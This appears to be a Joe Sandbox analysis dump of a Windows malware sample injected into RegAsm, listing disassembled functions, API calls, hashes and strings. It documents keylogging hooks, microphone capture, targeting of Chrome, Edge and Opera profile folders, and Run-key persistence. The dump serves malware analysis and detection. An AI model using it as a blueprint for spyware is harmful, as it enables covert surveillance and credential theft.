                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: alarm.wav$hYG
                          • API String ID: 1174141254-2782910960
                          • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                          • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                          • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                          • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                          Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                          • String ID: Online Keylogger Stopped
                          • API String ID: 1623830855-1496645233
                          • Opcode ID: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                          • Opcode Fuzzy Hash: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                          Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                          Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • waveInPrepareHeader.WINMM(00799000,00000020,?), ref: 00401849
                          • waveInAddBuffer.WINMM(00799000,00000020), ref: 0040185F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: wave$BufferHeaderPrepare
                          • String ID: XMG
                          • API String ID: 2315374483-813777761
                          • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                          • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                          Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocaleValid
                          • String ID: IsValidLocaleName$kKD
                          • API String ID: 1901932003-3269126172
                          • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                          • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                          Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                          • API String ID: 1174141254-4188645398
                          • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                          • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                          Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                          • API String ID: 1174141254-2800177040
                          • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                          • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                          Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: AppData$\Opera Software\Opera Stable\
                          • API String ID: 1174141254-1629609700
                          • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                          • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                          Function 00443885 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID: X8|
                          • API String ID: 269201875-3552716790
                          • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                          • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                          • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                          • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                          Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyState.USER32(00000011), ref: 0040B686
                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                          • String ID: [AltL]$[AltR]
                          • API String ID: 2738857842-2658077756
                          • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                          • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                          Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell
                          • String ID: !D@$open
                          • API String ID: 587946157-1586967515
                          • Opcode ID: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                          • Opcode Fuzzy Hash: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                          Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: State
                          • String ID: [CtrlL]$[CtrlR]
                          • API String ID: 1649606143-2446555240
                          • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                          • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                          Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                          • __Init_thread_footer.LIBCMT ref: 00410F64
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Init_thread_footer__onexit
                          • String ID: ,kG$0kG
                          • API String ID: 1881088180-2015055088
                          • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                          • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                          • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                          • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                          Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteOpenValue
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                          • API String ID: 2654517830-1051519024
                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                          Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteDirectoryFileRemove
                          • String ID: pth_unenc
                          • API String ID: 3325800564-4028850238
                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                          Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectProcessSingleTerminateWait
                          • String ID: pth_unenc
                          • API String ID: 1872346434-4028850238
                          • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                          • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                          • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                          • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                          Function 0041BB77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                          Download Yara Rule
                          APIs
                          • GetLastInputInfo.USER32(NG), ref: 0041BB87
                          • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountInfoInputLastTick
                          • String ID: NG
                          • API String ID: 3478931382-1651712548
                          • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                          • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                          • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                          • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                          Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                          • GetLastError.KERNEL32 ref: 00440D85
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0
                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                          Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                          Download Yara Rule
                          APIs
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastRead
                          • String ID:
                          • API String ID: 4100373531-0
                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                          Execution Graph

                          Execution Coverage:5.4%
                          Dynamic/Decrypted Code Coverage:9.2%
                          Signature Coverage:0%
                          Total number of Nodes:1990
                          Total number of Limit Nodes:56
                          execution_graph 37716 4466f4 37735 446904 37716->37735 37718 446700 GetModuleHandleA 37721 446710 __set_app_type __p__fmode __p__commode 37718->37721 37720 4467a4 37722 4467ac __setusermatherr 37720->37722 37723 4467b8 37720->37723 37721->37720 37722->37723 37736 4468f0 _controlfp 37723->37736 37725 4467bd _initterm GetEnvironmentStringsW _initterm 37726 44681e GetStartupInfoW 37725->37726 37727 446810 37725->37727 37729 446866 GetModuleHandleA 37726->37729 37737 41276d 37729->37737 37733 446896 exit 37734 44689d _cexit 37733->37734 37734->37727 37735->37718 37736->37725 37738 41277d 37737->37738 37780 4044a4 LoadLibraryW 37738->37780 37740 412785 37741 412789 37740->37741 37786 414b81 37740->37786 37741->37733 37741->37734 37744 4127c8 37790 412465 memset ??2@YAPAXI 37744->37790 37746 4127ea 37802 40ac21 37746->37802 37751 412813 37820 40dd07 memset 37751->37820 37752 412827 37825 40db69 memset 37752->37825 37755 412822 37847 4125b6 ??3@YAXPAX DeleteObject 37755->37847 37757 40ada2 _wcsicmp 37758 41283d 37757->37758 37758->37755 37761 412863 CoInitialize 37758->37761 37830 41268e 37758->37830 37760 412966 37848 40b1ab free free 37760->37848 37846 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37761->37846 37765 41296f 37849 40b633 37765->37849 37767 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37772 412957 CoUninitialize 37767->37772 37777 4128ca 37767->37777 37772->37755 37773 4128d0 TranslateAcceleratorW 37774 412941 GetMessageW 37773->37774 37773->37777 37774->37772 37774->37773 37775 412909 IsDialogMessageW 37775->37774 37775->37777 37776 4128fd IsDialogMessageW 37776->37774 37776->37775 37777->37773 37777->37775 37777->37776 37778 41292b TranslateMessage DispatchMessageW 37777->37778 37779 41291f IsDialogMessageW 37777->37779 37778->37774 37779->37774 37779->37778 37781 4044f3 37780->37781 37785 4044cf FreeLibrary 37780->37785 37783 404507 MessageBoxW 37781->37783 37784 40451e 37781->37784 37783->37740 37784->37740 37785->37781 37787 414b8a 37786->37787 37788 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37786->37788 37853 40a804 memset 37787->37853 37788->37744 37791 4124e0 37790->37791 37792 412505 ??2@YAPAXI 37791->37792 37793 41251c 37792->37793 37798 412521 37792->37798 37875 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37793->37875 37864 444722 37798->37864 37801 41259b wcscpy 37801->37746 37880 40b1ab free free 37802->37880 37806 40ad4b 37815 40ad76 37806->37815 37904 40a9ce 37806->37904 37807 40a9ce malloc memcpy free free 37808 40ac5c 37807->37808 37808->37806 37808->37807 37810 40ace7 free 37808->37810 37808->37815 37884 40a8d0 37808->37884 37896 4099f4 37808->37896 37810->37808 37814 40a8d0 7 API calls 37814->37815 37881 40aa04 37815->37881 37816 40ada2 37817 40adaa 37816->37817 37818 40adc9 37816->37818 37817->37818 37819 40adb3 _wcsicmp 37817->37819 37818->37751 37818->37752 37819->37817 37819->37818 37909 40dce0 37820->37909 37822 40dd3a GetModuleHandleW 37914 40dba7 37822->37914 37826 40dce0 3 API calls 37825->37826 37827 40db99 37826->37827 37986 40dae1 37827->37986 38000 402f3a 37830->38000 37832 412766 37832->37755 37832->37761 37833 4126d3 _wcsicmp 37834 4126a8 37833->37834 37834->37832 37834->37833 37836 41270a 37834->37836 38034 4125f8 7 API calls 37834->38034 37836->37832 38003 411ac5 37836->38003 37846->37767 37847->37760 37848->37765 37850 40b640 37849->37850 37851 40b639 free 37849->37851 37852 40b1ab free free 37850->37852 37851->37850 37852->37741 37854 40a83b GetSystemDirectoryW 37853->37854 37855 40a84c wcscpy 37853->37855 37854->37855 37860 409719 wcslen 37855->37860 37858 40a881 LoadLibraryW 37859 40a886 37858->37859 37859->37788 37861 409724 37860->37861 37862 409739 wcscat LoadLibraryW 37860->37862 37861->37862 37863 40972c 